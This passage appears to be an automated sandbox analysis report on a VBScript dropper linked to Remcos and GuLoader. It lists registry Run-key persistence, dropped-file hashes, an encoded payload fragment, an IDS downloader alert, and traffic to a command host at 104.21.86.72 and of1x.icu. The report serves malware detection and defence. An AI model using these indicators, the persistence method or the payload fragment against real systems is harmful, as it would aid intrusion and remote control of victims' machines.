                                                                                                      • Number of non-executed functions: 48
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .vbs

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target msiexec.exe, PID 6804 because there are no executed function
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 2504 because it is empty
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 764 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      00:41:02API Interceptor83x Sleep call for process: powershell.exe modified
                                                                                                      05:41:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-6US4Y7 "C:\ProgramData\Remcos\remcos.exe"
                                                                                                      05:41:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-6US4Y7 "C:\ProgramData\Remcos\remcos.exe"

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      104.21.86.72Sentinelled.vbsGet hashmaliciousUnknownBrowse
                                                                                                        Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                          Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            of1x.icuSentinelled.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.86.72
                                                                                                            Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 104.21.86.72
                                                                                                            Strait STS.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 172.67.216.143
                                                                                                            Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 104.21.86.72

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CLOUDFLARENETUSuZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.66.86
                                                                                                            trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                            • 172.64.41.3
                                                                                                            fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 104.16.249.249
                                                                                                            fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 104.16.248.249
                                                                                                            https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                            • 162.247.243.29
                                                                                                            http://217.28.130.10/8265/568747470733a2f2f6d61696c2d6864656c2e6c7664642e696e666f2f3f656d61696c3d62722e73756e67406864656c2e636f2e6b72Get hashmaliciousUnknownBrowse
                                                                                                            • 172.67.191.167
                                                                                                            Echelon.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.154.166
                                                                                                            Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.157.254
                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.65.145
                                                                                                            bas.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.71.155

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0etg.exeGet hashmaliciousBabadedaBrowse
                                                                                                            • 104.21.86.72
                                                                                                            tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                            • 104.21.86.72
                                                                                                            setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                            • 104.21.86.72
                                                                                                            Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 104.21.86.72
                                                                                                            medicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 104.21.86.72
                                                                                                            winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.86.72
                                                                                                            Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 104.21.86.72
                                                                                                            NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.86.72
                                                                                                            NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.86.72
                                                                                                            HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.86.72
                                                                                                            37f463bf4616ecd445d4a1937da06e19trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                            • 104.21.86.72
                                                                                                            9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                            • 104.21.86.72
                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.86.72
                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.86.72
                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.86.72
                                                                                                            AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                            • 104.21.86.72
                                                                                                            installer.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.86.72
                                                                                                            GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                            • 104.21.86.72
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                            • 104.21.86.72
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 104.21.86.72

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\ProgramData\Remcos\remcos.exeBrooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                              PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                  Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                    C7jdH7geD6.exeGet hashmaliciousUnknownBrowse
                                                                                                                      setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                        #U67e5#U8be2#U5165#U53e3.exeGet hashmaliciousUnknownBrowse
                                                                                                                          sample.exeGet hashmaliciousUnknownBrowse

                                                                                                                            Created / dropped Files

                                                                                                                            C:\ProgramData\Remcos\remcos.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):59904
                                                                                                                            Entropy (8bit):5.770776695007155
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:uo8HL2TB4LHLbo77Q2d9xSDvYD07BOUp8VKfTKznHVXq6ayYf3:vTB4LG7B8jY4XprIHw62
                                                                                                                            MD5:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                            SHA1:1D0C7CFCA8104D06DE1F08B97F28B3520C246CD7
                                                                                                                            SHA-256:3A90EDE157D40A4DB7859158C826F7B4D0F19A5768F6483C9BE6EE481C6E1AF7
                                                                                                                            SHA-512:2BE940F0468F77792C6E1B593376900C24FF0B0FAE8DC2E57B05596506789AA76119F8BE780C57252F74CD1F0C2FA7223FE44AE4FA3643C26DF00DD42BD4C016
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: Brooming.vbs, Detection: malicious, Browse
                                                                                                                            • Filename: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs, Detection: malicious, Browse
                                                                                                                            • Filename: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs, Detection: malicious, Browse
                                                                                                                            • Filename: Bnnebgers.vbs, Detection: malicious, Browse
                                                                                                                            • Filename: C7jdH7geD6.exe, Detection: malicious, Browse
                                                                                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                            • Filename: #U67e5#U8be2#U5165#U53e3.exe, Detection: malicious, Browse
                                                                                                                            • Filename: sample.exe, Detection: malicious, Browse
                                                                                                                            Reputation:low
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...tkq.tkq.tkq.`.r.skq.`.t.zkq.`.p.ykq.tkp..kq.`.x.wkq.`.u.=kq.`...ukq.`.s.ukq.Richtkq.........PE..L....E.%.....................^......0.............@.......................... ......\.....@...... ...................................................................(..T...............................@.......................@....................text...d........................... ..`.data...............................@....idata..............................@..@.didat..L...........................@....rsrc............ ..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):8003
                                                                                                                            Entropy (8bit):4.840877972214509
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                                            MD5:106D01F562D751E62B702803895E93E0
                                                                                                                            SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                                            SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                                            SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                                            Malicious:false
                                                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                                                                            MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                                                                            SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                                                                            SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                                                                            SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e................................. ..............@..........

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3sovubi.mde.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cg0ec2kx.z0v.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehq10qwn.vwl.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkgzrzdi.ndm.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Roaming\Wealthmaking.Asr

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):441512
                                                                                                                            Entropy (8bit):5.974857041853696
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:bS4XrsPEASuibD0fdBnf9qojXLgNpjRxWh8eOi5n0hjKnLtassYM+wHxO3G9PLVD:bzu6ed1VnUNRDMOi5nqItZsYMNHxQGFp
                                                                                                                            MD5:E03D2D397ED28D6B14BEF58A8D4D458D
                                                                                                                            SHA1:7D4576F4E95FCE89C46F8938E4878E4978451064
                                                                                                                            SHA-256:3431EFE72E7264A06276D165454755C1A1F98B0F57132C43F8369DB6B3C6324A
                                                                                                                            SHA-512:FF97033C57032E8F65334183D70C44F3D4B95151E27605AAB48A68CD5DD53278AE43F8004F96D38F218C3A8D320EBF329C342199F8987691240F45855AD8ED34
                                                                                                                            Malicious:false
                                                                                                                            Preview:cQGbcQGbuwGBFgBxAZtxAZsDXCQE6wKYC+sClgi5gFjdy+sC1p3rAvWogek/d1QlcQGb6wKUOIHBvx53WXEBm3EBm3EBm+sCr1K6lTknWusCWIrrArcB6wJgdusCsasxyusCpU9xAZuJFAvrAjZjcQGb0eLrAksncQGbg8EE6wInwnEBm4H5v4FZAnzK6wJWUHEBm4tEJARxAZvrAqZCicNxAZtxAZuBwzajQgHrAhxT6wLTU7rMgfrhcQGbcQGbgfKSZwag6wKCPesC4IuB8l7m/EFxAZtxAZvrAp8GcQGbcQGbcQGbiwwQ6wLkyesC6VqJDBNxAZtxAZtC6wIIlnEBm4H6cJQEAHXWcQGbcQGbiVwkDOsC98JxAZuB7QADAABxAZvrAoYNi1QkCOsCA3brAkMoi3wkBOsCQiXrAuHUietxAZvrAvqDgcOcAAAA6wKPS3EBm1PrAv70cQGbakDrAj/EcQGbietxAZvrApDDx4MAAQAAABBzAusCzBrrAqoJgcMAAQAA6wKQh+sCbslTcQGbcQGbievrAq4I6wIdcom7BAEAAHEBm3EBm4HDBAEAAHEBm3EBm1PrAp7UcQGbav9xAZtxAZuDwgXrAvMOcQGbMfbrApMTcQGbMcnrAiYGcQGbixpxAZvrAlfBQXEBm3EBmzkcCnX06wJmAusCSEJG6wLv6OsCfOmAfAr7uHXccQGbcQGbi0QK/HEBm+sCLBcp8OsCHV9xAZv/0nEBm+sCFge6cJQEAHEBm+sCGksxwOsCZxXrAi/ui3wkDHEBm+sCy06BNAfVGudO6wIZL+sC37ODwATrAtf16wLYJTnQdeJxAZtxAZuJ+3EBm+sCl/r/1+sCm5pxAZtV5m2m1RrnTo6TAolQARixKqVbVtebUlUq5Rj5XAg7z2ABGLEqwnjhd5tSVSrlGJ58v5sCKpf8sSrlkrnt2IHLDU9uq1DSXrZhLFhyAJsW/iIb2ncGIz/PJJChTUCbGSXZ

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:ASCII text, with very long lines (349), with CRLF, CR line terminators
                                                                                                                            Entropy (8bit):4.966028065574932
                                                                                                                            TrID:
                                                                                                                              File name:Rokadernes.vbs
                                                                                                                              File size:73'628 bytes
                                                                                                                              MD5:693321a98dce16a4369d750bac3c4fb0
                                                                                                                              SHA1:cadf2497394e79cfd3c02a4f5bbb1adb6503d29c
                                                                                                                              SHA256:d719392462e09d59474cafa8d7b107d4e3063a664a51e87c5e2b750cf100be69
                                                                                                                              SHA512:8e97a99d8c64243fb6a348703d5bde412e599064162fc44be9f07cc28c78fff28720cce03df253c8537dd370abbaad0748fa02f2b828a64b54c6504d4eeaf1c5
                                                                                                                              SSDEEP:1536:mYzMve/RmHTWUZnz7FcfIJVd00cYiEzYfOEt2b4:mYiepmzWqz5tJ300bz9Et2b4
                                                                                                                              TLSH:BB734B62EF28166B0E5B279AFD581E43C57CC615452728E1BEE9070D600A8ECE3FE71D
                                                                                                                              File Content Preview:....Bestanddelsknoglemarvspr = RTrim("Courages")....'Taffle flaskehalses, uppowoc..'Asteer disengagere,..'Manducable: viljestyrkerne! dslere mandelgavens bogsamlingers..'Creophagous? handelsrejser, externate111! paedometrical? impostrous!..'Profilernes, i

                                                                                                                              File Icon

                                                                                                                              Icon Hash:68d69b8f86ab9a86

                                                                                                                              Network Behavior

                                                                                                                              Suricata IDS Alerts

                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-12-23T06:41:44.226095+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449737104.21.86.72443TCP

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 23, 2024 06:41:04.572505951 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:04.572536945 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:04.572616100 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:04.581509113 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:04.581537008 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:05.805879116 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:05.806015968 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:05.847883940 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:05.847950935 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:05.848921061 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:05.895420074 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:05.946475029 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:05.987377882 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.432308912 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.432440042 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.432487965 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.432512999 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.432600975 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.432641029 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.432655096 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.432756901 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.432811975 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.432826042 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.440124035 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.440195084 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.440210104 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.456600904 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.456691027 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.456707001 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.504628897 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.551769972 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.555815935 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.555882931 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.555912971 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.598373890 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.623848915 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.628964901 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.629026890 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.629046917 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.636954069 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.637034893 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.637049913 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.644884109 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.644951105 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.644965887 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.652775049 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.652832985 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.652853966 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.660871983 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.660933018 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.660949945 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.668987989 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.669054985 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.669070959 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.676877022 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.676938057 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.676951885 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.692713022 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.692781925 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.692802906 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.700581074 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.700680971 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.700686932 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.700711966 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.700758934 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.709526062 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.717442036 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.717524052 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.717545033 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.717664003 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.717725039 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.717736959 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.770287991 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.815382004 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.815596104 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.815685987 CET49730443192.168.2.4104.21.86.72
